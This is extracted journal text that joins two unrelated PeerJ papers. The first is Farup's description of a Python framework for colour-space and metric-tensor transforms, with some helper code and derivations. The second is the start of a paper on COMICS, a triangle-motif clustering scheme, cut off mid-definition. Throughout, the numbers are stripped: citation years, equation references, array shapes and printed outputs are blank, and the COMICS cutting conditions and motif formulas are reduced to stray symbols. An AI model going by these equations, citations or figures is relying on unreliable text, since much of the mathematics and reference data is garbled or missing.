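def from_polar(x):
    out = np.empty_like(x)
    out[:, 0] = x[:, 0]
    out[:, 1] = x[:, 1] * np.cos(x[:, 2])
    out[:, 2] = x[:, 1] * np.sin(x[:, 2])
    return out

def to_xyY(xyz):
    """projective chromaticity coordinates (x, y, Y) from tristimulus values."""
    s = xyz.sum(axis=1, keepdims=True)
    return np.column_stack((xyz[:, :2] / s, xyz[:, 1]))

def log_compress(x, a, b):
    """logarithmic compression of a channel, x -> a*ln(1 + b*x)."""
    return a * np.log(1 + b * x)

def poincare_radius(chroma, R):
    """chroma-preserving mapping of the radial coordinate onto the poincare disk;
    the 2*R scaling of the argument is an assumption, not taken from the source."""
    return np.tanh(chroma / (2 * R))
```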
besides these more generic transformations, various non-linear transformation functions specific to individual colour spaces are used in such cases as srgb, cielab, cieluv, the underlying colour space of the ciede metric, etc.

transformation of tensorial data
most colour metrics can be represented in the form of a line element, or a differential quadratic form (wyszecki & stiles, , chapter . ), as
$$ds^2 = d\mathbf{x}^{\mathsf T} G\, d\mathbf{x}.$$
here, $G$ is the metric tensor—a function of the coordinates. for metrics defined as euclidean distances in a given colour space, the metric tensor is the identity tensor, $I$, in the given space. some colour metrics, like, e.g., ciede , cannot be written in this form, but can be linearised—or riemannised—to a good approximation (pant & farup, ). under a coordinate transformation, $\bar{\mathbf{x}} = \bar{\mathbf{x}}(\mathbf{x})$, this metric transforms according to
$$ds^2 = d\mathbf{x}^{\mathsf T} G\, d\mathbf{x} = d\bar{\mathbf{x}}^{\mathsf T} \left(\frac{\partial \mathbf{x}}{\partial \bar{\mathbf{x}}}\right)^{\!\mathsf T} G\, \frac{\partial \mathbf{x}}{\partial \bar{\mathbf{x}}}\, d\bar{\mathbf{x}} = d\bar{\mathbf{x}}^{\mathsf T} \bar{G}\, d\bar{\mathbf{x}},$$
where $\partial \mathbf{x}/\partial \bar{\mathbf{x}}$ is the jacobian matrix of the coordinate transform with components $\partial x_i/\partial \bar{x}_j$. in other words, the metric tensor transforms according to
$$\bar{G} = \left(\frac{\partial \mathbf{x}}{\partial \bar{\mathbf{x}}}\right)^{\!\mathsf T} G\, \frac{\partial \mathbf{x}}{\partial \bar{\mathbf{x}}}.$$
under composition of several coordinate transformations, $\tilde{\mathbf{x}} = \tilde{\mathbf{x}}(\bar{\mathbf{x}}) = \tilde{\mathbf{x}}(\bar{\mathbf{x}}(\mathbf{x}))$, the process is nested,
$$ds^2 = d\tilde{\mathbf{x}}^{\mathsf T} \left(\frac{\partial \bar{\mathbf{x}}}{\partial \tilde{\mathbf{x}}}\right)^{\!\mathsf T} \left(\frac{\partial \mathbf{x}}{\partial \bar{\mathbf{x}}}\right)^{\!\mathsf T} G\, \frac{\partial \mathbf{x}}{\partial \bar{\mathbf{x}}}\, \frac{\partial \bar{\mathbf{x}}}{\partial \tilde{\mathbf{x}}}\, d\tilde{\mathbf{x}}, \qquad
\tilde{G} = \left(\frac{\partial \bar{\mathbf{x}}}{\partial \tilde{\mathbf{x}}}\right)^{\!\mathsf T} \left(\frac{\partial \mathbf{x}}{\partial \bar{\mathbf{x}}}\right)^{\!\mathsf T} G\, \frac{\partial \mathbf{x}}{\partial \bar{\mathbf{x}}}\, \frac{\partial \bar{\mathbf{x}}}{\partial \tilde{\mathbf{x}}},$$
which can also be seen directly from the chain rule for the jacobian matrices,
$$\frac{\partial \mathbf{x}}{\partial \tilde{\mathbf{x}}} = \frac{\partial \mathbf{x}}{\partial \bar{\mathbf{x}}}\, \frac{\partial \bar{\mathbf{x}}}{\partial \tilde{\mathbf{x}}}.$$
all the points with unit distance from a given central point—a unit ball—constitute an ellipsoid
$$\mathbf{x}^{\mathsf T} G\, \mathbf{x} = 1.$$
the cross section of this ellipsoid with a principal plane in a given coordinate is obtained by setting the corresponding $x_i = 0$, reducing the ellipsoid to an ellipse (pant & farup, ),
$$\begin{pmatrix} x_1 & x_2 \end{pmatrix} \begin{pmatrix} g_{11} & g_{12} \\ g_{12} & g_{22} \end{pmatrix} \begin{pmatrix} x_1 \\ x_2 \end{pmatrix} = 1,$$
with angle $\theta$ and semi-axes $a$ and $b$ given by
$$\tan(2\theta) = \frac{2 g_{12}}{g_{11} - g_{22}}, \qquad a = \frac{1}{\sqrt{g_{11} + g_{12}\cot\theta}}, \qquad b = \frac{1}{\sqrt{g_{22} - g_{12}\cot\theta}}.$$

system architecture
since the computation of generic colour space transforms and, in particular, the composition of their jacobian matrices can be a tedious and error-prone process (see, e.g., pant & farup, ), an object-oriented framework for transforming colour and metric data between colour spaces has been implemented as a python package colour. the package consists of six partially interdependent modules: space, data, metric, tensor, statistics and misc. the relationship between the modules is shown in fig. . in the figure, the arrows indicate dependencies between the modules in the form of python imports. each of the modules contains functions, classes and predefined objects with the purpose of simplifying the implementation of new colour spaces and metrics.

figure structure of the modules within the colour package. the arrows indicate dependencies in the form of python imports.

representing colour spaces
the core functionality of the colour space and colour metric transforms is found in the space module. the basic idea in designing the object-oriented framework is to realise a colour space as an object, and to facilitate the construction of new such objects by providing classes for transforming new colour spaces from already existing ones. the class hierarchy which constitutes the core of the module is shown in fig. . all boxes represent classes, and the arrows denote class inheritance. italicized method names indicate methods that should be overridden in a subclass.
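before going further into the class hierarchy, note that the transformation rule for metric tensors above reduces to a single vectorised operation over a stack of jacobians. the sketch below is illustrative, not the package implementation; the ellipse parameters are recovered by eigendecomposition, which for a positive-definite tensor is equivalent to the trigonometric formulas above.

```python
import numpy as np

def transform_tensors(jacobians, tensors):
    """apply g_bar = j^t g j to a stack of metric tensors.
    jacobians: (n, 3, 3) matrices dx/dx_bar evaluated at each colour;
    tensors:   (n, 3, 3) metric tensors g in the original space."""
    return np.einsum('nji,njk,nkl->nil', jacobians, tensors, jacobians)

def ellipse_parameters(g2):
    """orientation and semi-axes of the unit ellipse of a 2 x 2 metric tensor
    (a principal-plane cross section of the ellipsoid above)."""
    g11, g12, g22 = g2[0, 0], g2[0, 1], g2[1, 1]
    theta = 0.5 * np.arctan2(2 * g12, g11 - g22)
    lam = np.linalg.eigvalsh(g2)         # ascending eigenvalues of the quadratic form
    a, b = 1.0 / np.sqrt(lam)            # semi-axes, major axis first
    return theta, a, b
```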
details about attributes and auxiliary methods etc. have been left out for readability. all colour space objects must derive from the abstract space class, and as such implement the methods to_xyz and from_xyz for converting colour data between the xyz colour space and the colour space represented by the object, and the methods jacobian_xyz and inv_jacobian_xyz for computing the corresponding jacobian matrix and its inverse. the two latter methods are implemented in space as inverses of each other, so the subclasses only need to implement one of them—the other one can be inherited. the colour data is represented as n × numpy (oliphant, ) ndarrays, and the jacobian matrices as n × × ndarrays. all transformations between colour spaces must go through xyz, which thus serves a special role, and has a separate class of its own. here, the transformations are simply the identity transform, and the jacobian matrices are identity matrices. all other colour spaces farup ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure structure of the classes within the space module. data types and parameters are not shown for the derived methods. will be built by transforming colour data from an already existing colour space, starting from xyz. to facilitate making the specific transforms, an abstract class transform is provided. during instantiation of a transformed colour space object, the base space of the transformation has to be set. the virtual methods to_base and from_base for converting colour data to and from the base base, and jacobian_base and inv_jacobian_base for computing the jacobian matrix and its inverse between the current space and the base space must be provided in the derived classes. the methods to_xyz, from_xyz, jacobian_xyz, and inv_jacobian_xyz are implemented in the base class transform using the transformation between the current space and the base space (provided by derived classes) and the corresponding transformations in the base class, see eq. ( ). hence, there is no need to reimplement these in the derived classes. finally, the concrete colour space tranforms are implemented as classes transformxxx derived from transform. they must all implement the methods to_base, from_base and either jacobian_base or inv_jacobian_base. the remaining methods will be inferred by inheritance. in some cases, though, it is more efficient to provide more methods in order to reduce the computational cost. for example, in transformlinear, both methods jacobian_base and inv_jacobian_base are provided in order to avoid inverting every single jacobian matrix for large data sets. representing colour and metric data the colour space objects constructed by the method described above, will convert colour data represented as n × ndarrays (n colour data points). for real-life applications, colours some times come as single data points ( -vectors), some times as lists of colour data (n × matrices), and some times as images (m ×n × arrays). in order for the farup ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the data and tensordata classes for keeping track of colour data and metric data, respec- tively. user not having to deal with converting back and forth between these formats, as well as remembering in which colour space all the data is given, a separate class data for storing colour data has been implemented as part of the data module, cf. fig. . again, the boxes denote classes. 
in this module, there are no inheritance relationship between the classes, but they are related by the tensordata class having an attribute of the data type. a colour data object can be instantiated with single colour data, lists of colour data, or colour images in any implemented colour space. the data object takes the colour space (object) of the data as an argument, and keeps a dictionary of the colour spaces in which the data in question has been computed. when the colour data in a given space is requested (using the get method), it first checks the dictionary whether it has already been computed. if not, it is computed, stored in the dictionary and returned. all the actual computations are taken care of by the hierarcy of colour space objects representing the transforms necessary for building the colour space. a similar approach is taken for colour metric data in the form of colour tensors, see fig. . in this case, both the locations of the colour metrics (as colour data), and the metrics themselves are represented in the class. like for the colour data, a dictionary of the computed tensors is maintained. for the conversion between the different colour spaces, the jacobian matrices are applied according to eq. ( ). the nested tensor transforms, eq. ( ), are implicitly taken care of by the colour space class hierarchy without the user having to interfere. colour metrics, tensors and statistics the four remaining modules, metric, tensor, statistics, and misc contain separate functions (not part of the class hierarchy) for computing various properties of colour data, colour transforms, and sets of these. the metric module has functions for computing the most common colour metrics, such as the standard cie eab and euv metrics, ciede (luo, cui & rigg, ), the different versions of the din metric as described by cui et al. ( ), the log-compressed osa-ucs metric ee by oleari, melgosa & huertas ( ), as well as a general euclidean distance and the poincare disk metric developed in reference (farup, ) in any colour space. all these functions take two colour data objects of the same size as arguments, and return an n-vector of colour differences. the tensor module has functions for computing the metric tensors corresponding to the metrics in the metric package. the functions take one colour data object as argument, and farup ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. returns the corresponding tensordata object. the statistics module contains functions for calculating various statistics of colour metric data, such as the stress measure (garcía et al., ) and pant’s r-values (pant & farup, ; pant, farup & melgosa, ). the misc module contains miscellaneous supporting functions. computational complexity the framework has been implemented using numpy (oliphant, ) ndarrays, and all operations for colour and metric conversion are vectorised. thus, all the real computations take place using the highly optimised underlying libraries for matrices, such as lapack (anderson et al., ) etc. no loops over individual colour data are implemented in the high-level language. thus, there are only two sources of computational overhead by using the framework. first, there are the function calls associated with computing the transformations between a given colour space and its bases all the way back to the ciexyz colour space. these function calls will only take place once per transformation call. 
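the per-space cache of the data class described above is what keeps this overhead to a single conversion per requested space. the sketch below shows the caching pattern only; it is not the package's actual class, and the space interface (to_xyz/from_xyz on n x 3 ndarrays) is assumed from the description above.

```python
import numpy as np

class Data:
    """minimal sketch of the lazy, per-space cache; `space` objects are assumed to
    expose to_xyz/from_xyz operating on n x 3 ndarrays, as described above."""

    def __init__(self, space, ndata):
        ndata = np.asarray(ndata, dtype=float)
        self.shape = ndata.shape              # (3,), (n, 3) or (m, n, 3)
        self.flat = ndata.reshape(-1, 3)      # all formats handled internally as n x 3
        self.space = space
        self.cache = {space: self.flat}       # one entry per colour space already computed

    def get(self, space):
        """return the data in `space`; the conversion (always via xyz) runs only once."""
        if space not in self.cache:
            xyz = self.space.to_xyz(self.flat)
            self.cache[space] = space.from_xyz(xyz)
        return self.cache[space].reshape(self.shape)
```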
this can be a significant overhead when the data set consists of only one or very few data points, but then the computation is very quick anyway. for bigger colour data sets, such as images, this will represent only very few function calls (given by the number of steps in the transformation from ciexyz to the given space), and thus be negligible in comparison with the real computation, which takes place at the highly optimised low-level code. secondly, all colour and metric conversions go through the ciexyz colour space. when converting between two colour spaces based on a common basis other than ciexyz, an unneccesary conversion back and forth between this common basis and ciexyz will inevitably take place. it would, in principle, be possible to eliminate this by advanced optimisation techniques, but since the computations are already fast (fractions of a second even for quite large images), and the goal of the framework has been ease of implementation rather than computational efficiency, this has not been prioritized. not all of the operations in the statistics module are vectorised, although this would in principle also be possible. the reason for this is that they are mainly meant for colour research applications, and as such, they are not expected to be used in production. for the relevant use in research, data collection etc. will be much more time consuming than the actual computations, so computational efficiency has not been emphasized in this part of the framework. example application in order to demonstrate the power of the proposed approach, a simple demo application is shown in fig. . in this short code (less than a page), (i) a new colour space is implemented, (ii) individual colours, lists of colours and a colour image is converted to the new colour space, (iii) the tensorial data corresponding to the macadam ellipses is converted by the help of the jacobian matrices of the transformation to the new space, and (iv) the colour difference between two images is computed as a eucildean distance in the newly constructed colour space. these operations would normally require days of programming, but with the use of the proposed framework it is all achieved by a few lines of code. farup ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure small demo of the colour package. in lines – , the library is imported. in a real application, one would normally only import the colour package (import colour), and refer to the elements as, e.g., colour.space.transformlinear etc., but here the specific classes, objects and functions needed are imported specifically, simply in order to reduce the size and improve the readability of the remaining code. the transformation to the ipt colour space (ebner & fairchild, ) is composed of a linear transform from xyz followed by a gamma correction, followed by final linear farup ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure an image (a) and its gamut clipped version (b). figure the i (a), p (b), and t (c) planes of the image shown in fig. a. farup ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the macadam ellipses plotted in the pt-plane of the ipt colour space. figure difference maps of the two images shown in fig. for eab (a), e (b), and the euclidean distance in the ipt colour space (c). transform. the code for constructing this colour space is given in lines – of fig. . 
it should be noted that the programmer does not need to specify anything about the computation of the corresponding jacobian matrices—everyting is taken care of by the constructors of the transformation classes. once the colour space is constructed, the data class can use it for converting colours in various formats such as single data points—lines – —giving [ . e- . e- . e- ], farup ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. lists of colour points—lines – —giving [[ . e- . e- . e- ] [ . e- . e- . e- ] [ . e+ . e+ . e+ ]], and even colour images (lines – ). the individual ipt colour planes of the image shown in fig. a resulting from this (lines – ) are shown in fig. . in order to demonstrate also the transformation of tensorial colour data, the code in lines – loads, transforms, and plots the macadam ellipses (macadam, ) in the pt-plane of the ipt space. the latter includes the tedious process of computing the transformation of the corresponding metric tensors according to eq. ( ). the resulting plot is shown in fig. . similarly, the colour.metric module can compute colour differences of colour data in any format, including images. for example, the code in lines – of fig. computes the difference maps of the two images shown in fig. for eab, e and the euclidean distance in the newly implemented ipt colour space. the results are shown in fig. . please note that the entire code used to generate figs. – is shown in fig. . conclusion an object-oriented computational framework for colour metrics and colour has been designed and implemented in python. the framework strongly simplifies the implementation of new colour spaces for transfroming colour data and as well as tensorial colour metric data between the various colour spaces without compromising too much on the computational complexity. the code is freely available at github (https://github.com/ifarup/colourspace). future extensions could include icc support, computation geodesics based on the colour metrics (pant & farup, ), computation and representation of colour gamuts (bakke, farup & hardeberg, ), as well as gamut mapping algorithms (alsam & farup, ) in any colour space, and under any colour metric. additional information and declarations funding this research has been supported by the research council of norway through project no. ‘hypercept – colour and quality in higher dimensions’. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the author: research council of norway: . farup ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/ifarup/colourspace http://dx.doi.org/ . /peerj-cs. competing interests the author declares there are no competing interests. author contributions • ivar farup conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: https://github.com/ifarup/colourspace. references alsam a, farup i. . colour gamut mapping as a constrained variational problem. in: salberg a-b, hardeberg jy, jenssen r, eds. image analysis, th scandinavian con- ference, scia . lecture notes in computer science, vol. . berlin, heidelberg: springer, – . 
anderson e, bai z, bischof c, blackford s, demmel j, dongarra j, du croz j, green- baum a, hammarling s, mckenney a, sorensen d. . lapack users’ guide. rd edition. philadelphia: society for industrial and applied mathematics. bakke am, farup i, hardeberg jy. . evaluation of algorithms for the determi- nation of color gamut boundaries. journal of imaging science and technology ( ): – doi . /j.imagingsci.technol. . . . . beall mw, shephard ms. . an object-oriented framework for reliable numerical simulations. engineering with computers ( ): – doi . /s . cai x, langtangen hp, moe h. . on the performance of the python programming language for serial and parallel scientific computations. scientific programming ( ): – doi . / / . cui g, luo mr, rigg b, roesler g, witt k. . uniform colour spaces based on the din colour-difference formula. color research & application ( ): – doi . /col. . deza mm, deza e. . encyclopedia of distances. berlin, heidelberg: springer. ebner f, fairchild md. . development and testing of a color space (ipt) with improved hue uniformity. in: the sixth color imaging conference: color science, systems and applications. springfield: society for imaging science and technology, – . farup i. . hyperbolic geometry for colour metrics. optics express ( ): – doi . /oe. . . garcía pa, huertas r, melgosa m, cui g. . measurement of the relationship between perceived and computed color differences. journal of the optical society of america a ( ): – doi . /josaa. . . farup ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/ifarup/colourspace http://dx.doi.org/ . /j.imagingsci.technol. . . . http://dx.doi.org/ . /s http://dx.doi.org/ . / / http://dx.doi.org/ . /col. http://dx.doi.org/ . /col. http://dx.doi.org/ . /oe. . http://dx.doi.org/ . /oe. . http://dx.doi.org/ . /josaa. . http://dx.doi.org/ . /peerj-cs. lenz r, carmona pl, meer p. . the hyperbolic geometry of illumination-induced chromaticity changes. in: computer vision and pattern recognition, . cvpr’ . ieee conference on. piscataway: ieee, – . luo mr, cui g, rigg b. . the development of the cie colour-difference formula: ciede . color research & application ( ): – doi . /col. . macadam dl. . visual sensitivities to color differences in daylight. journal of the optical society of america a ( ): – doi . /josa. . . moroney n, fairchild md, hunt rwg, li c, luo mr, newman t. . the ciecam color appearance model. in: proceedings of is & t and sid’s th color imaging conference: color science and engineering: systems, technologies, applications. springfield: society for imaging science and technology, – . oleari c, melgosa m, huertas r. . euclidean color-difference formula for small– medium color differences in log-compressed osa-ucs space. journal of the optical society of america a ( ): – . oliphant te. . python for scientific computing. computing in science & engineering : – doi . /mcse. . . pant dr, farup i. . riemannian formulation and comparison of color difference formulas. color research & application ( ): – doi . /col. . pant dr, farup i. . geodesic calculation of color difference formulas and comparison with the munsell color order system. color research & application ( ): – doi . /col. . pant dr, farup i, melgosa m. . analysis of three euclidean color-difference formulas for predicting the average rit-dupont color-difference ellipsoids. in: proceedings of aic — th international aic congress, – . plataniotis kn, venetsanopoulos an. . color image processing and applications. new york: springer. 
van rossum g, drake jr fl. . python reference manual. amsterdam: centrum voor wiskunde en informatica amsterdam. wyszecki g, stiles ws. . color science—concepts and methods, quantitative data and formulae. new york: john wiley & sons. farup ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /col. http://dx.doi.org/ . /josa. . http://dx.doi.org/ . /mcse. . http://dx.doi.org/ . /col. http://dx.doi.org/ . /col. http://dx.doi.org/ . /peerj-cs. comics: a community property-based triangle motif clustering scheme comics: a community property-based triangle motif clustering scheme yufan feng , shuo yu , kaiyuan zhang , xiangli li and zhaolong ning , school of software, dalian university of technology, dalian, china state key laboratory for novel software technology, nanjing university, nanjing, china abstract with the development of science and technology, network scales of various fields have experienced an amazing growth. networks in the fields of biology, economics and society contain rich hidden information of human beings in the form of connectivity structures. network analysis is generally modeled as network partition and community detection problems. in this paper, we construct a community property-based triangle motif clustering scheme (comics) containing a series of high efficient graph partition procedures and triangle motif-based clustering techniques. in comics, four network cutting conditions are considered based on the network connectivity. we first divide the large-scale networks into many dense subgraphs under the cutting conditions before leveraging triangle motifs to refine and specify the partition results. to demonstrate the superiority of our method, we implement the experiments on three large-scale networks, including two co-authorship networks (the american physical society (aps) and the microsoft academic graph (mag)), and two social networks (facebook and gemsec-deezer networks). we then use two clustering metrics, compactness and separation, to illustrate the accuracy and runtime of clustering results. a case study is further carried out on aps and mag data sets, in which we construct a connection between network structures and statistical data with triangle motifs. results show that our method outperforms others in both runtime and accuracy, and the triangle motif structures can bridge network structures and statistical data in the academic collaboration area. subjects algorithms and analysis of algorithms, graphics, network science and online social networks keywords community property, triangle motif, large network, clustering introduction in all aspects of human endeavor, we are in the world of large-scale data, embracing the aspects of biology, medicine, social, traffic, and science (ning et al., ). these data sets describe the complicated real-world systems from various and complementary viewpoints. generally, the entities in real-world systems are modeled as nodes, whose connections and relationships are modeled as edges. those networks become new carriers of rich information from domain-specific areas, such as the reciprocity among people in online social networks (koll, li & fu, ). more than that, human beings are inclined to cooperate or participate in group activities, which can be reflected in social and academic collaboration networks. 
to be more specific, in academic area, big scholarly data grows rapidly, containing millions of authors, papers, citations, figures, tables, and other how to cite this article feng y, yu s, zhang k, li x, ning z. . comics: a community property-based triangle motif clustering scheme. peerj comput. sci. :e doi . /peerj-cs. submitted december accepted february published march corresponding author zhaolong ning, zhaolongning@dlut.edu.cn academic editor yilun shang additional information and declarations can be found on page doi . /peerj-cs. copyright feng et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:zhaolongning@�dlut.�edu.�cn https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ massive scale related data, such as digital libraries and scholarly networks (xia et al., ). as collaboration behaviors among scholars are becoming frequent, collaboration networks are generally in large-scale and contain rich collaboration information, reflecting the cooperation patterns among scholars in different research areas. bordons et al. ( ) regard the academic teams as scientists communities, in which scholars can share research methods, materials, and financial resources rather than institutions organized by fixed structures (barjak & robinson, ). furthermore, the ternary closures in social networks constitute a minimal stable structure; that is, a loop with three nodes. the number of ternary closures in social networks changes over time, which reveals the evolvement of human social behaviors. besides, the definition of a clustering coefficient is based on the distributions of ternary closures. milo et al. ( ) defined small network structures as motifs to present interconnections in complex networks by numbers that are significantly higher than those in randomized networks. motifs can define universal classes of networks, and researchers are carrying on the motif detection experiments on networks from different areas, such as biochemistry, neurobiology, and engineering, to uncover the existence of motifs and the corresponding structure information in networks (ribeiro, silva & kaiser, ; bian & zhang, ). hence, triangle motifs can be used to uncover relationships in networks. connectivity is a fundamental character in both graph theory and network science. when networks are in small-scale, the dense areas can be easily identified. however, with the rapid growth of network scale and diversity, many graph partition methods, community detection, and clustering algorithms fail to uncover the information of graph structure. graph partition and mining algorithms consume a large amount of time when dealing with large-scale networks, for example, the gspan algorithm (yan & han, ) and the min–cut algorithm (stoer & wagner, ), which overlook the elementary network structures. the clusters and subgraphs of a large network are generally have small internal distances and large external distances among nodes. considering the ternary closures, triangle network motifs have been regarded as elementary units in networks. however, a general method to cluster the communities and analyze the relationships with community properties and triangle motifs effectively is still lacking. 
in this paper, we propose a community property-based triangle motif clustering scheme (comics) to cluster network communities, and analyze the relationships with triangle motifs. in this method, we partition networks with the edge connection properties and regard the undirected and unweighted complete triangle motifs as the element clustering units. the partition operations are based on four network cutting conditions, whose definitions are based on the network connectivity to maintain the massive links in networks. more than that, by considering the american physical society (aps) and microsoft academic graph (mag) data sets in the academic analysis area, we regard each cluster generated from the input network as an academic team, and define three metrics: teamwork of collaborator variance (tcv), teamwork of paper variance (tpv), and motif variances of scholars (msv) to evaluate the feng et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ behaviors of the detected academic teams. our contributions can be summarized as follows: � by jointly considering time complexity and clustering accuracy, we construct the comics, which mines the structure information with complete triangle motifs. a series of speed-up and refining methods, graph partition and refining techniques, are integrated to improve the performance of the basic clustering process. � we prove the time complexity of the presented algorithm is o(rn ), where r is the number of the clustered subgraphs from the original large network, and n is the number of nodes. � we regard the undirected and unweight complete triangle motif as the elementary unit instead of nodes in the clustering procedure. our work verifies that the complete triangle motif is available in network analysis. � we define three metrics to analyze the hidden information in academic collaboration networks. performance evaluations show that the academic teams with high quantity of scholar motif variances also have high values of tcvs. the roadmap of this paper is illustrated as follows. we briefly illustrate the related works in the following section. after that, a series of fundamental definitions, problem statement, and some necessary notations are described. then, we describe the architecture of comics in details. we evaluate the performance of our method with three large-scale networks as case studies in the experiment section. finally, we conclude this paper. related work information mining from large-scale networks is a significant research topic, reflecting the connecting patterns, and the social relationships among different entities (shi et al., ; schaeffer, ). in collaboration networks, the information reflects the collaboration patterns and academic social relationships among scholars in different disciplines. community detection is traditionally considered as a kind of graph partition to discover exhaustive and disjoined node clusters in a given network (khan et al., ). the discovery of structures in networks has attracted scholars’ attentions for a long time. the authors in leskovec et al. ( ) explore from a novel perspective to identify meaningful communities in large social and information networks. they notice that large networks have very different structures. for example, different transcription networks from escherichia coli and saccharomyces cerevisiae have large differences in the frequency motif structures (wegner, ). 
over the past years, a number of graph clustering methods have been investigated. for example, evolutionary algorithms (eas) have been proposed and applied successfully in the network optimization and clustering problems (gong et al., ). recently, scholars have successfully developed both single- and multi-objective eas to discover internal structure information of networks (li & liu, ; pizzuti, ). a particle swarm optimization algorithm is put forward, which reveals community structures in large-scale social networks (cai et al., ). in girvan & newman ( ), node centrality and betweeness centrality were used to extract feng et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ communities in a network. since modularity is becoming very popular by partitioning networks into non-overlapping subgraphs, modularity score, compactness-isolation, and other criteria are leveraged to evaluate functions in large graph partition problems bagrow ( ). a number of large-scale partition methods based on community detection start with a given seed, and then expand by iteratively adding the neighboring node that contributes most to the score function, until the score function stops improving (luo, wang & promislow, ; ma et al., ). the authors in du et al. ( ) developed an efficient community detection method in social networks, which combines the topological information with the entity attributions to detect network communities. however, this method works for merely part of network structures. motifs in networks are small connected subnetworks, occurring in significant high frequencies and have recently gathered attentions. motifs in networks have been studied as elementary structures in complex network analysis (shervashidze et al., ). in hypergraphs, the clustering algorithms mainly focus on transforming the hypergraphs into simple graphs (zhou, huang & schölkopf, ). then, the simple graphs can be clustered with spectral clustering procedures based on the normalized laplacian matrices (li & milenkovic, ). in that case, the motifs can be constructed with nodes from different graph layers of hypergraphs (zhou, huang & schölkopf, ), for example, a triangle motif can be used to represent one heterogeneous hypergraph with three different layers. more than that, conductance is a vital definition in spectral clustering (louis, ; li & milenkovic, ). hence, in large-scale networks, spectral clustering and motif are combined to large-scale network clustering. triangle motif structures guarantee the structural connections. the motif-based conductance ensures the applicability spectral clustering in large-scale networks. some local graph clustering methods have been investigated by incorporating high-order network information captured by small subgraphs (yin et al., ; lee, gharan & trevisan, ; li et al., b). in wegner ( ), the authors define a subgraph cover to represent the network with motifs. the cover consists of a set of motifs and their corresponding frequencies. besides, the network motifs can be detected by comparing the frequencies of subgraphs in the original network with a statistical model. the authors in wegner ( ) notice that real networks contain significant densities of different motifs. it illustrates networks in different fields hold different collaboration patterns, and motifs are the fingerprints of different networks. 
by observing the characteristics from real networks, benson, gleich & leskovec ( ) develop a generalized framework to cluster networks on basis of higher-order connected patterns. a framework is proposed to model the relations between higher-order motif instances and graph nodes with a bipartite graph (li et al., a). in monti, otness & bronstein ( ), motifnet is introduced to deal with directed graphs by exploiting local graph motifs. in order to tackle the graph analysis problem, we combine the graph partition method with the motif-based clustering procedure to speed up the clustering process. feng et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ system model and problem formulation in this section, we present basic theoretical definitions about cutting conditions and the mathematical expressions of motifs. after that, we describe the investigated problems in details. comparative conditions for cluster in this subsection, we introduce four conditions to partition the original large collaboration networks into different clusters. for a given graph g = (v, e), we define the adjacent matrix h = {hi,j} as: if there exists an edge between vertices i and j, hi,j = ; otherwise, hi,j = . network partition is defined as: p ¼ fg ; g ; . . . ; gkg; � k � jvj, subject to: ( ) sk k¼ gk ¼ v, ( ) gk \ gt ¼ [, ∀k s t, and ( ) gk ¼ [; k. for ∀k, the partition p satisfies the x—valid condition, called x—valid cluster partition of g, and x is defined as the following conditions according to lu et al. ( ): condition : x j gk hi;j > x j vngk hi;j; i gk; k: ( ) condition : x j gk hi;j > x j gt hi;j; i gk; k ¼ t: ( ) condition : x j gk hi;j > x i gk; j vngk hi;j; k: ( ) condition : x j gk hi;j > x i gk; j gt hi;j; k ¼ t: ( ) conditions and check the validity of clusters at the vertex level to confirm whether the internal degree of each vertex is larger than that of the external degree. conditions and check the validity of clusters, that is, comparing the total internal degree of each cluster. when large graphs are partitioned under the above-mentioned four conditions, condition generally results in fewer, but larger subgraphs; condition will lead to more and smaller communities; conditions and will cause more and smaller communities than condition , but fewer and larger communities than condition . definitions of network triangle motifs in real networks, the most common high-order structures are small network subgraphs, which are defined as motifs, that is, a set of edges with a small number of nodes. in this paper, we analyze undirected triangular motif-based networks. formally, we define a triangle motif by a tuple (b, a), where b is a � binary matrix and a � f ; ; � � � ; ng is the set of anchor nodes. the matrix b encodes the edge pattern between the three nodes in triangle motifs, and a represents a relevant subset of nodes to define motif conductance. then, let wa be a selection function, taking the subset of a -tuple induced by a. define set (·) as the operator, which takes a tuple to a set, set (v , v , v ) = {v , v , v }. then, the motif set of an unweighted and undirected graph with adjacency matrix a can be denoted by eq. ( ), where v s v s v , feng et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ tri ðb; aÞ ¼ fset ðvÞ; set ðvaðvÞÞjv vk; av ¼ bg: ( ) here, av is the k � k adjacency matrix of the subgraph with k nodes of the order vector v. 
